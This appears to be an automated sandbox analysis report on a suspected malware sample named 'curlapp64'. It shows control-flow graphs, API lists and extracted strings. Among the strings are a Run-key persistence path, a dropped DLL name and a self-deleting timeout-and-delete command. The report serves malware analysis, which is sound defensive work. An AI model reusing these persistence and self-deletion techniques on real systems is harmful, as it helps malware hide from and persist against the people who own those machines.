                                                                                                                                control_flow_graph 729 7ff8a9356b50-7ff8a9356b91 730 7ff8a9356b9d-7ff8a9356ba8 call 7ff8a9356910 729->730 731 7ff8a9356b93-7ff8a9356b98 729->731 736 7ff8a9356baa-7ff8a9356baf 730->736 737 7ff8a9356bb4-7ff8a9356bc6 call 7ff8a9358670 730->737 732 7ff8a93574bf 731->732 735 7ff8a93574c1-7ff8a93574e5 call 7ff8a9369e10 732->735 736->732 737->732 742 7ff8a9356bcc-7ff8a9356bd6 737->742 743 7ff8a9356bd8-7ff8a9356be8 _strdup 742->743 744 7ff8a9356bea-7ff8a9356bf4 742->744 743->736 743->744 745 7ff8a9356c08-7ff8a9356c12 744->745 746 7ff8a9356bf6-7ff8a9356c06 _strdup 744->746 747 7ff8a9356c14-7ff8a9356c24 _strdup 745->747 748 7ff8a9356c33-7ff8a9356c42 call 7ff8a93574f0 745->748 746->736 746->745 747->736 750 7ff8a9356c26-7ff8a9356c2d 747->750 748->732 752 7ff8a9356c48-7ff8a9356c56 748->752 750->748 753 7ff8a9356c68-7ff8a9356c72 752->753 754 7ff8a9356c58-7ff8a9356c5f 752->754 756 7ff8a9356cbd-7ff8a9356ccc call 7ff8a9357960 753->756 757 7ff8a9356c74-7ff8a9356c7b 753->757 754->753 755 7ff8a9356c61 754->755 755->753 756->732 762 7ff8a9356cd2-7ff8a9356cee 756->762 757->756 758 7ff8a9356c7d-7ff8a9356cb7 call 7ff8a9334eb0 call 7ff8a935a7c0 757->758 758->736 758->756 764 7ff8a9356cf9-7ff8a9356d00 762->764 765 7ff8a9356cf0-7ff8a9356cf7 762->765 767 7ff8a9356d03-7ff8a9356d0a 764->767 765->764 765->767 769 7ff8a9356d0c-7ff8a9356d1c _strdup 767->769 770 7ff8a9356d22-7ff8a9356d2e 767->770 769->736 769->770 771 7ff8a9356d46-7ff8a9356d48 770->771 772 7ff8a9356d30-7ff8a9356d43 _strdup 770->772 771->732 773 7ff8a9356d4e-7ff8a9356d64 call 7ff8a9357e20 771->773 772->771 773->732 776 7ff8a9356d6a-7ff8a9356d71 773->776 777 7ff8a9356d87-7ff8a9356d8e 776->777 778 7ff8a9356d73-7ff8a9356d81 call 7ff8a932ec10 776->778 779 7ff8a9356da4-7ff8a9356dab 777->779 780 7ff8a9356d90-7ff8a9356d9e call 7ff8a932ec10 777->780 778->735 778->777 783 7ff8a9356dad-7ff8a9356dbb call 7ff8a932ec10 779->783 784 7ff8a9356de5-7ff8a9356dee 779->784 780->735 780->779 783->735 796 7ff8a9356dc1-7ff8a9356dc8 783->796 788 7ff8a9356e07-7ff8a9356e0e 784->788 789 7ff8a9356df0-7ff8a9356dfc 784->789 790 7ff8a9356e14-7ff8a9356e1b 788->790 791 7ff8a9356e10-7ff8a9356e12 788->791 789->788 793 7ff8a9356dfe-7ff8a9356e05 789->793 794 7ff8a9356e24-7ff8a9356e32 790->794 795 7ff8a9356e1d 790->795 791->790 791->794 793->788 797 7ff8a9356e4e-7ff8a9356e58 794->797 798 7ff8a9356e34-7ff8a9356e41 794->798 795->794 796->784 799 7ff8a9356dca-7ff8a9356ddc call 7ff8a934e230 796->799 800 7ff8a9356e68-7ff8a9356e6f 797->800 801 7ff8a9356e5a-7ff8a9356e61 797->801 798->732 807 7ff8a9356e47 798->807 799->784 808 7ff8a9356dde 799->808 805 7ff8a9356e71-7ff8a9356e78 800->805 806 7ff8a9356e83-7ff8a9356e91 800->806 801->800 805->806 809 7ff8a9356e7a-7ff8a9356e81 805->809 810 7ff8a9356e9c 806->810 811 7ff8a9356e93-7ff8a9356e9a 806->811 807->797 808->784 812 7ff8a9356ea0-7ff8a9356ebc call 7ff8a9334d90 809->812 810->812 811->812 815 7ff8a9356ebe-7ff8a9356ec0 812->815 816 7ff8a9356ec5-7ff8a9356ecc 812->816 815->732 817 7ff8a9356ed0-7ff8a9356ed7 816->817 817->817 818 7ff8a9356ed9-7ff8a9356ef7 call 7ff8a934e150 817->818 821 7ff8a9356efd-7ff8a9356f36 818->821 822 7ff8a9356f92-7ff8a9356fd5 call 7ff8a9364ff0 818->822 826 7ff8a9356f38-7ff8a9356f52 call 7ff8a9337450 call 7ff8a9309b70 821->826 827 7ff8a9356f82-7ff8a9356f8d call 7ff8a9355fc0 821->827 822->732 828 7ff8a9356fdb-7ff8a9356fea call 7ff8a930ad70 822->828 826->732 842 7ff8a9356f58-7ff8a9356f67 call 7ff8a9359050 826->842 827->732 835 7ff8a9356fec-7ff8a9356ff2 828->835 836 7ff8a9356ff8-7ff8a9357001 828->836 835->836 839 7ff8a9357303 835->839 840 7ff8a9357305-7ff8a9357316 836->840 841 7ff8a9357007-7ff8a935702d 836->841 839->840 845 7ff8a9357328-7ff8a935732b 840->845 846 7ff8a9357318-7ff8a935731f 840->846 843 7ff8a935705e 841->843 844 7ff8a935702f-7ff8a9357036 841->844 861 7ff8a9356f7d call 7ff8a9354eb0 842->861 862 7ff8a9356f69-7ff8a9356f78 842->862 853 7ff8a9357060-7ff8a935706b 843->853 848 7ff8a9357038-7ff8a935703f 844->848 849 7ff8a9357041-7ff8a935704f call 7ff8a9338330 844->849 851 7ff8a935749d-7ff8a93574ba call 7ff8a9314b60 call 7ff8a9355720 845->851 852 7ff8a9357331-7ff8a935733f call 7ff8a9309ee0 845->852 846->845 850 7ff8a9357321 846->850 848->843 848->849 849->843 871 7ff8a9357051-7ff8a9357058 849->871 850->845 851->732 872 7ff8a935748e-7ff8a9357498 call 7ff8a9314b60 852->872 873 7ff8a9357345-7ff8a9357348 852->873 858 7ff8a935706d-7ff8a935707b 853->858 859 7ff8a9357081 853->859 858->859 866 7ff8a935707d-7ff8a935707f 858->866 860 7ff8a9357083-7ff8a935708e 859->860 867 7ff8a93570ad 860->867 868 7ff8a9357090-7ff8a9357097 860->868 861->827 862->732 866->860 878 7ff8a93570af-7ff8a93570ed call 7ff8a930a7b0 867->878 868->867 876 7ff8a9357099-7ff8a93570a7 868->876 871->843 881 7ff8a935705a-7ff8a935705c 871->881 872->851 874 7ff8a935737c-7ff8a935738b call 7ff8a9364ee0 873->874 875 7ff8a935734a-7ff8a9357376 call 7ff8a9314b60 873->875 874->732 889 7ff8a9357391-7ff8a93573ab call 7ff8a9337450 call 7ff8a9309b70 874->889 875->851 875->874 876->867 884 7ff8a93570a9-7ff8a93570ab 876->884 878->840 890 7ff8a93570f3-7ff8a93570fa 878->890 881->853 884->878 889->732 903 7ff8a93573b1-7ff8a93573b8 889->903 892 7ff8a93570fc-7ff8a9357147 free * 2 890->892 893 7ff8a935714e-7ff8a935715d 890->893 892->893 895 7ff8a9357207-7ff8a93572b5 free * 3 call 7ff8a9355720 893->895 896 7ff8a9357163-7ff8a9357200 free * 4 893->896 901 7ff8a93572b7-7ff8a93572be 895->901 902 7ff8a93572c0-7ff8a93572c7 895->902 896->895 904 7ff8a93572d6-7ff8a93572fe call 7ff8a9314b60 901->904 905 7ff8a93572c9-7ff8a93572d0 902->905 906 7ff8a93572d2 902->906 907 7ff8a93573de-7ff8a93573e5 903->907 908 7ff8a93573ba-7ff8a93573c0 903->908 909 7ff8a935740c-7ff8a9357423 call 7ff8a9355fc0 call 7ff8a9359050 904->909 905->904 906->904 907->909 910 7ff8a93573e7-7ff8a93573ee 907->910 908->907 912 7ff8a93573c2-7ff8a93573d7 call 7ff8a9314b60 908->912 909->732 923 7ff8a9357429-7ff8a935742f 909->923 910->909 913 7ff8a93573f0-7ff8a9357405 call 7ff8a9314b60 910->913 912->907 913->909 924 7ff8a9357437-7ff8a9357440 call 7ff8a9358e00 923->924 925 7ff8a9357431-7ff8a9357435 923->925 929 7ff8a9357445-7ff8a9357449 924->929 926 7ff8a935744b-7ff8a935748c call 7ff8a93092b0 925->926 926->732 929->732 929->926
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: %u/%d/%s$Allowing DoH to override max connection limit$NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                                                                                                                                • API String ID: 0-2902238462
                                                                                                                                • Opcode ID: 2b05b9d7d767020b8d379a144df4db33f2fea9fa66fb0a38a5545a4e1ad473dc
                                                                                                                                • Instruction ID: 911ce7f1c355536239d6d89077481bbf7fd6124af2577444c679f6ebbd19b883
                                                                                                                                • Opcode Fuzzy Hash: 2b05b9d7d767020b8d379a144df4db33f2fea9fa66fb0a38a5545a4e1ad473dc
                                                                                                                                • Instruction Fuzzy Hash: EC425D62A0EFC2AAEB558F2595403BD67B4EB49BC8F086035CE8E87395DF3CE5518350
                                                                                                                                Function 00007FF8A934FE30 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 152libraryloadernetworkCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1048 7ff8a934fe30-7ff8a934fe4c 1049 7ff8a934fe4e-7ff8a934fe60 WSAStartup 1048->1049 1050 7ff8a934fe96-7ff8a934fe9d call 7ff8a9314840 1048->1050 1051 7ff8a934fe79-7ff8a934fe95 call 7ff8a9369e10 1049->1051 1052 7ff8a934fe62-7ff8a934fe69 1049->1052 1058 7ff8a93500ab-7ff8a93500c2 call 7ff8a9369e10 1050->1058 1059 7ff8a934fea3-7ff8a934fec8 GetModuleHandleW 1050->1059 1054 7ff8a934fe6b-7ff8a934fe71 1052->1054 1055 7ff8a934fe73 WSACleanup 1052->1055 1054->1050 1054->1055 1055->1051 1061 7ff8a934feca-7ff8a934fed1 1059->1061 1062 7ff8a934fed6-7ff8a934ff13 GetProcAddress wcspbrk 1059->1062 1064 7ff8a9350066-7ff8a93500a3 call 7ff8a935c700 QueryPerformanceFrequency 1061->1064 1065 7ff8a934ff3d-7ff8a934ff40 1062->1065 1066 7ff8a934ff15-7ff8a934ff1b 1062->1066 1064->1058 1071 7ff8a934ff6c-7ff8a934ff83 GetSystemDirectoryW 1065->1071 1072 7ff8a934ff42-7ff8a934ff55 GetProcAddress 1065->1072 1069 7ff8a934ff1d-7ff8a934ff2a 1066->1069 1070 7ff8a934ff2f-7ff8a934ff38 LoadLibraryW 1066->1070 1074 7ff8a935002e-7ff8a9350048 1069->1074 1070->1074 1076 7ff8a934ff89-7ff8a934ffa0 malloc 1071->1076 1077 7ff8a9350026 1071->1077 1072->1071 1075 7ff8a934ff57-7ff8a934ff67 LoadLibraryExW 1072->1075 1074->1064 1079 7ff8a935004a-7ff8a935005d GetProcAddress 1074->1079 1075->1074 1080 7ff8a935001d-7ff8a9350020 free 1076->1080 1081 7ff8a934ffa2-7ff8a934ffb0 GetSystemDirectoryW 1076->1081 1077->1074 1079->1064 1082 7ff8a935005f 1079->1082 1080->1077 1081->1080 1083 7ff8a934ffb2-7ff8a934ffbc 1081->1083 1082->1064 1084 7ff8a934ffc0-7ff8a934ffc9 1083->1084 1084->1084 1085 7ff8a934ffcb 1084->1085 1086 7ff8a934ffd2-7ff8a934ffd9 1085->1086 1086->1086 1087 7ff8a934ffdb-7ff8a934ffe8 1086->1087 1088 7ff8a934fff0-7ff8a934fffe 1087->1088 1088->1088 1089 7ff8a9350000-7ff8a9350006 1088->1089 1090 7ff8a9350008-7ff8a9350012 1089->1090 1091 7ff8a9350014 LoadLibraryW 1089->1091 1092 7ff8a935001a 1090->1092 1091->1092 1092->1080
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartupfreemallocwcspbrk
                                                                                                                                • String ID: AddDllDirectory$LoadLibraryExW$if_nametoindex$iphlpapi.dll$kernel32
                                                                                                                                • API String ID: 2084031714-2297675747
                                                                                                                                • Opcode ID: 25d10e906bd9ae6e16c691fc1285ab9041ef61e00e4e74a3fa809b4385e8702e
                                                                                                                                • Instruction ID: adbb3e8d8b6825f802fe59e68f46dece73f21b561928434012e446b17fb18ded
                                                                                                                                • Opcode Fuzzy Hash: 25d10e906bd9ae6e16c691fc1285ab9041ef61e00e4e74a3fa809b4385e8702e
                                                                                                                                • Instruction Fuzzy Hash: 31617621A0EED6A6FA609F11E81437A63B1FF88BC1F496135C95E83794EF2CE446C710
                                                                                                                                Function 00007FF6CABD9950 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 388registryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1094 7ff6cabd9950-7ff6cabd99ea call 7ff6cabdaa00 call 7ff6cabd8d30 RegOpenKeyExW 1099 7ff6cabd99ec-7ff6cabd99fb 1094->1099 1100 7ff6cabd9a36-7ff6cabd9a3f 1094->1100 1101 7ff6cabd9a00-7ff6cabd9a30 RegSetValueExW RegCloseKey 1099->1101 1102 7ff6cabd99fd 1099->1102 1103 7ff6cabd9a41-7ff6cabd9a58 1100->1103 1104 7ff6cabd9a78-7ff6cabd9a7f 1100->1104 1101->1100 1102->1101 1105 7ff6cabd9a73 call 7ff6cabe3b50 1103->1105 1106 7ff6cabd9a5a-7ff6cabd9a6d 1103->1106 1107 7ff6cabd9a93-7ff6cabd9ae3 call 7ff6cabda440 * 2 call 7ff6cabd8d30 1104->1107 1108 7ff6cabd9a81-7ff6cabd9a8c curl_global_init 1104->1108 1105->1104 1106->1105 1109 7ff6cabd9fca-7ff6cabd9fcf call 7ff6cabf1878 1106->1109 1122 7ff6cabd9ae5-7ff6cabd9af4 1107->1122 1123 7ff6cabd9b16-7ff6cabd9b38 call 7ff6cabda830 1107->1123 1108->1107 1116 7ff6cabd9fd0-7ff6cabd9fd5 call 7ff6cabf1878 1109->1116 1124 7ff6cabd9fd6-7ff6cabd9fdb call 7ff6cabf1878 1116->1124 1125 7ff6cabd9af6 1122->1125 1126 7ff6cabd9af9-7ff6cabd9b14 call 7ff6cac05ce0 1122->1126 1134 7ff6cabd9b3b-7ff6cabd9b72 1123->1134 1132 7ff6cabd9fdc-7ff6cabd9fe1 call 7ff6cabf1878 1124->1132 1125->1126 1126->1134 1143 7ff6cabd9fe2-7ff6cabd9fe7 call 7ff6cabf1878 1132->1143 1136 7ff6cabd9b74-7ff6cabd9b8b 1134->1136 1137 7ff6cabd9bab-7ff6cabd9be7 1134->1137 1140 7ff6cabd9b8d-7ff6cabd9ba0 1136->1140 1141 7ff6cabd9ba6 call 7ff6cabe3b50 1136->1141 1138 7ff6cabd9bf0 1137->1138 1142 7ff6cabd9bf4-7ff6cabd9c1e call 7ff6cabb42e0 call 7ff6cabb7b30 1138->1142 1140->1116 1140->1141 1141->1137 1151 7ff6cabd9c52-7ff6cabd9c55 1142->1151 1152 7ff6cabd9c20-7ff6cabd9c32 1142->1152 1155 7ff6cabd9cb1-7ff6cabd9cde call 7ff6cabd9400 1151->1155 1156 7ff6cabd9c57-7ff6cabd9c62 1151->1156 1153 7ff6cabd9c34-7ff6cabd9c47 1152->1153 1154 7ff6cabd9c4d call 7ff6cabe3b50 1152->1154 1153->1124 1153->1154 1154->1151 1162 7ff6cabd9ce0-7ff6cabd9cf6 1155->1162 1163 7ff6cabd9d16-7ff6cabd9d1d 1155->1163 1156->1142 1159 7ff6cabd9c64-7ff6cabd9c76 call 7ff6cabb3c60 1156->1159 1169 7ff6cabd9c9d-7ff6cabd9cac call 7ff6cabc0390 1159->1169 1170 7ff6cabd9c78-7ff6cabd9c83 1159->1170 1165 7ff6cabd9d11 call 7ff6cabe3b50 1162->1165 1166 7ff6cabd9cf8-7ff6cabd9d0b 1162->1166 1167 7ff6cabd9d1f-7ff6cabd9d25 curl_global_cleanup 1163->1167 1168 7ff6cabd9d2c-7ff6cabd9d5a RegOpenKeyExW 1163->1168 1165->1163 1166->1165 1175 7ff6cabd9fc4-7ff6cabd9fc9 call 7ff6cabf1878 1166->1175 1167->1168 1171 7ff6cabd9d80-7ff6cabd9e19 call 7ff6cabd8d30 call 7ff6cabdab30 call 7ff6cabd9220 1168->1171 1172 7ff6cabd9d5c-7ff6cabd9d7a RegDeleteValueW RegCloseKey 1168->1172 1169->1138 1170->1169 1173 7ff6cabd9c85-7ff6cabd9c98 call 7ff6cabc0390 1170->1173 1187 7ff6cabd9e1e-7ff6cabd9e27 1171->1187 1172->1171 1173->1138 1175->1109 1188 7ff6cabd9e60-7ff6cabd9e68 1187->1188 1189 7ff6cabd9e29-7ff6cabd9e40 1187->1189 1192 7ff6cabd9ea0-7ff6cabd9ea8 1188->1192 1193 7ff6cabd9e6a-7ff6cabd9e80 1188->1193 1190 7ff6cabd9e42-7ff6cabd9e55 1189->1190 1191 7ff6cabd9e5b call 7ff6cabe3b50 1189->1191 1190->1132 1190->1191 1191->1188 1194 7ff6cabd9edb-7ff6cabd9ef4 1192->1194 1195 7ff6cabd9eaa-7ff6cabd9ebb 1192->1195 1197 7ff6cabd9e82-7ff6cabd9e95 1193->1197 1198 7ff6cabd9e9b call 7ff6cabe3b50 1193->1198 1202 7ff6cabd9f2c-7ff6cabd9f61 call 7ff6cabe3bc8 1194->1202 1203 7ff6cabd9ef6-7ff6cabd9f0c 1194->1203 1200 7ff6cabd9ebd-7ff6cabd9ed0 1195->1200 1201 7ff6cabd9ed6 call 7ff6cabe3b50 1195->1201 1197->1143 1197->1198 1198->1192 1200->1175 1200->1201 1201->1194 1210 7ff6cabd9f63-7ff6cabd9f79 1202->1210 1211 7ff6cabd9f95-7ff6cabd9fc3 call 7ff6cabe3b30 1202->1211 1205 7ff6cabd9f0e-7ff6cabd9f21 1203->1205 1206 7ff6cabd9f27 call 7ff6cabe3b50 1203->1206 1205->1175 1205->1206 1206->1202 1213 7ff6cabd9f90 call 7ff6cabe3b50 1210->1213 1214 7ff6cabd9f7b-7ff6cabd9f8e 1210->1214 1213->1211 1214->1175 1214->1213
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenValue$DeleteHandleModulecurl_global_cleanupcurl_global_init
                                                                                                                                • String ID: %$Software\Microsoft\Windows\CurrentVersion\Run$\prnttemp.dll$curlapp64$timeout /t 10 /nobreak && del /q "{}"
                                                                                                                                • API String ID: 3531770516-4205545808
                                                                                                                                • Opcode ID: e79b346f49909aacd29b8a8953c1e5780a77a4a5500037c124915aec458dc264
                                                                                                                                • Instruction ID: f01d7a38f4196e2ddd8a54840678b4ceefac54edfcc7a8545e4e3ce776adf0cf
                                                                                                                                • Opcode Fuzzy Hash: e79b346f49909aacd29b8a8953c1e5780a77a4a5500037c124915aec458dc264
                                                                                                                                • Instruction Fuzzy Hash: 8402A262F18A8285EB00DF68F4643AD2761FB857A9F505271EADD93AD9DF3CE184C300
                                                                                                                                Function 00007FF6CABB42E0 Relevance: 32.0, APIs: 15, Strings: 3, Instructions: 516COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1342 7ff6cabb42e0-7ff6cabb4334 curl_easy_init 1343 7ff6cabb4361-7ff6cabb4369 1342->1343 1344 7ff6cabb4336-7ff6cabb435c call 7ff6cabbb6c0 1342->1344 1346 7ff6cabb436e-7ff6cabb4373 1343->1346 1347 7ff6cabb436b 1343->1347 1351 7ff6cabb4542-7ff6cabb4576 call 7ff6cabe3b30 1344->1351 1349 7ff6cabb4375-7ff6cabb4378 1346->1349 1350 7ff6cabb437a-7ff6cabb4382 1346->1350 1347->1346 1352 7ff6cabb439e-7ff6cabb4408 call 7ff6cabe3b58 call 7ff6cabb88d0 1349->1352 1353 7ff6cabb4384-7ff6cabb438f 1350->1353 1354 7ff6cabb4398-7ff6cabb439a 1350->1354 1362 7ff6cabb4410-7ff6cabb442d call 7ff6cabc0a70 1352->1362 1353->1354 1356 7ff6cabb4391-7ff6cabb4395 1353->1356 1354->1352 1356->1354 1365 7ff6cabb442f-7ff6cabb4458 call 7ff6cabb5040 call 7ff6cabb4b50 1362->1365 1370 7ff6cabb445e-7ff6cabb4499 call 7ff6cabb3c60 1365->1370 1371 7ff6cabb4aa7-7ff6cabb4acb curl_easy_cleanup call 7ff6cabb7c00 1365->1371 1377 7ff6cabb44b3 1370->1377 1378 7ff6cabb449b-7ff6cabb44a6 1370->1378 1371->1351 1376 7ff6cabb4ad1-7ff6cabb4ae2 1371->1376 1379 7ff6cabb4ae8-7ff6cabb4afb 1376->1379 1380 7ff6cabb453d call 7ff6cabe3b50 1376->1380 1382 7ff6cabb44b8-7ff6cabb44da call 7ff6cabc0390 curl_easy_cleanup curl_easy_init 1377->1382 1378->1377 1381 7ff6cabb44a8-7ff6cabb44b1 1378->1381 1383 7ff6cabb4b0e-7ff6cabb4b13 call 7ff6cabf1878 1379->1383 1384 7ff6cabb4afd 1379->1384 1380->1351 1381->1382 1389 7ff6cabb44e0-7ff6cabb450f call 7ff6cabbb6c0 1382->1389 1390 7ff6cabb4577-7ff6cabb45dc call 7ff6cabe3b58 call 7ff6cabb88d0 1382->1390 1394 7ff6cabb4b14-7ff6cabb4b19 call 7ff6cabf1878 1383->1394 1384->1380 1389->1351 1398 7ff6cabb4511-7ff6cabb4522 1389->1398 1404 7ff6cabb45e1-7ff6cabb45ff call 7ff6cabc0a70 1390->1404 1401 7ff6cabb4b1a-7ff6cabb4b1f call 7ff6cabf1878 1394->1401 1398->1380 1402 7ff6cabb4524-7ff6cabb4537 1398->1402 1409 7ff6cabb4b20-7ff6cabb4b25 call 7ff6cabf1878 1401->1409 1402->1380 1402->1383 1410 7ff6cabb4601-7ff6cabb461b call 7ff6cabb5040 1404->1410 1415 7ff6cabb4b26-7ff6cabb4b2b call 7ff6cabf1878 1409->1415 1414 7ff6cabb4620-7ff6cabb463e call 7ff6cabb7b30 1410->1414 1420 7ff6cabb4640-7ff6cabb4654 1414->1420 1421 7ff6cabb4674-7ff6cabb4699 call 7ff6cabb4b50 1414->1421 1422 7ff6cabb4b2c-7ff6cabb4b31 call 7ff6cabf1878 1415->1422 1423 7ff6cabb466f call 7ff6cabe3b50 1420->1423 1424 7ff6cabb4656-7ff6cabb4669 1420->1424 1421->1371 1431 7ff6cabb469f-7ff6cabb46a2 1421->1431 1430 7ff6cabb4b32-7ff6cabb4b37 call 7ff6cabf1878 1422->1430 1423->1421 1424->1394 1424->1423 1431->1371 1432 7ff6cabb46a8-7ff6cabb46c9 call 7ff6cabb3c60 1431->1432 1437 7ff6cabb46f0-7ff6cabb46fa 1432->1437 1438 7ff6cabb46cb-7ff6cabb46da 1432->1438 1440 7ff6cabb46ff-7ff6cabb4727 call 7ff6cabc0390 call 7ff6cabb5e30 1437->1440 1438->1437 1439 7ff6cabb46dc-7ff6cabb46ee 1438->1439 1439->1440 1445 7ff6cabb4a67-7ff6cabb4a6f 1440->1445 1446 7ff6cabb472d-7ff6cabb4758 call 7ff6cabb6180 1440->1446 1447 7ff6cabb4a71-7ff6cabb4a82 1445->1447 1448 7ff6cabb4a9e-7ff6cabb4aa3 1445->1448 1455 7ff6cabb475e-7ff6cabb4783 call 7ff6cabb5b40 1446->1455 1456 7ff6cabb4a25-7ff6cabb4a30 1446->1456 1450 7ff6cabb4a84-7ff6cabb4a97 1447->1450 1451 7ff6cabb4a99 call 7ff6cabe3b50 1447->1451 1448->1371 1450->1451 1453 7ff6cabb4b02-7ff6cabb4b07 call 7ff6cabf1878 1450->1453 1451->1448 1467 7ff6cabb4b08-7ff6cabb4b0d call 7ff6cabf1878 1453->1467 1464 7ff6cabb49e1-7ff6cabb49e9 1455->1464 1465 7ff6cabb4789-7ff6cabb47a1 curl_easy_cleanup curl_easy_init 1455->1465 1456->1445 1457 7ff6cabb4a32-7ff6cabb4a46 1456->1457 1461 7ff6cabb4a61-7ff6cabb4a66 call 7ff6cabe3b50 1457->1461 1462 7ff6cabb4a48-7ff6cabb4a5b 1457->1462 1461->1445 1462->1430 1462->1461 1472 7ff6cabb4a1c-7ff6cabb4a21 1464->1472 1473 7ff6cabb49eb-7ff6cabb49fc 1464->1473 1468 7ff6cabb48d8-7ff6cabb493b call 7ff6cabe3b58 call 7ff6cabb88d0 1465->1468 1469 7ff6cabb47a7-7ff6cabb47d3 call 7ff6cabbb6c0 1465->1469 1467->1383 1495 7ff6cabb4940-7ff6cabb495d call 7ff6cabc0a70 1468->1495 1482 7ff6cabb47d5-7ff6cabb47e6 1469->1482 1483 7ff6cabb4806-7ff6cabb481a 1469->1483 1472->1456 1477 7ff6cabb49fe-7ff6cabb4a11 1473->1477 1478 7ff6cabb4a17 call 7ff6cabe3b50 1473->1478 1477->1422 1477->1478 1478->1472 1485 7ff6cabb4801 call 7ff6cabe3b50 1482->1485 1486 7ff6cabb47e8-7ff6cabb47fb 1482->1486 1487 7ff6cabb4851-7ff6cabb4859 1483->1487 1488 7ff6cabb481c-7ff6cabb4830 1483->1488 1485->1483 1486->1422 1486->1485 1490 7ff6cabb488c-7ff6cabb489d 1487->1490 1491 7ff6cabb485b-7ff6cabb486c 1487->1491 1493 7ff6cabb4832-7ff6cabb4845 1488->1493 1494 7ff6cabb484b-7ff6cabb4850 call 7ff6cabe3b50 1488->1494 1490->1351 1498 7ff6cabb48a3-7ff6cabb48b4 1490->1498 1496 7ff6cabb486e-7ff6cabb4881 1491->1496 1497 7ff6cabb4887 call 7ff6cabe3b50 1491->1497 1493->1401 1493->1494 1494->1487 1505 7ff6cabb495f-7ff6cabb4998 call 7ff6cabb5040 call 7ff6cabb7b30 1495->1505 1496->1409 1496->1497 1497->1490 1498->1380 1502 7ff6cabb48ba-7ff6cabb48cd 1498->1502 1502->1467 1506 7ff6cabb48d3 1502->1506 1511 7ff6cabb49cc-7ff6cabb49e0 call 7ff6cabb4b50 1505->1511 1512 7ff6cabb499a-7ff6cabb49ac 1505->1512 1506->1380 1511->1464 1513 7ff6cabb49ae-7ff6cabb49c1 1512->1513 1514 7ff6cabb49c7 call 7ff6cabe3b50 1512->1514 1513->1415 1513->1514 1514->1511
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
